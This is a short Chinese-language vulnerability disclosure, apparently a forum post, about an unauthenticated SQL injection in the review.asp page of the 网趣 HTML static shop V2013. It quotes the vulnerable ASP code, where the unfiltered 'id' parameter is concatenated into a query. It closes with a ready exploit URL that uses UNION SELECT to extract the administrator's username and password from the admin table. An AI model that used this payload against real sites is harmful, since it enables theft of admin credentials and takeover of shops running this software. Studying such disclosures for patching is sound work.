网趣HTML静态 V2013版 某页面依旧存在注入可爆管理员帐号密码! review.asp页面未对参数过滤,并且未能像v13版的一样验证权限,导致可直接被注入。 %dim bookid,action //定义变量pinglunid=request.QueryString(id) //接收变量并赋值action=request.QueryStr
review.asp页面未对参数过滤,并且未能像v13版的一样验证权限,导致可直接被注入。
<%dim bookid,action //定义变量
pinglunid=request.QueryString("id") //接收变量并赋值
action=request.QueryString("action") //接收变量并赋值
if action="save" then //如果变量action=save就执行下面的SQL语句
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from review where pinglunid="&pinglunid,conn,1,3 //执行SQL
rs("huifu")=HTMLEncode2(trim(request("huifu")))
rs("huifudate")=now()
rs.update
rs.close
set rs=nothing
response.write "<script language=javascript>alert('您的回复已成功提交!!');history.go(-1);</script>"
response.End
end if
%>
EXP:
http://127.0.0.1/2013/admin/review.asp?id=1%20union%20select%201,2,3,4,5,admin,7,8,9,password,11%20%20from%20admin
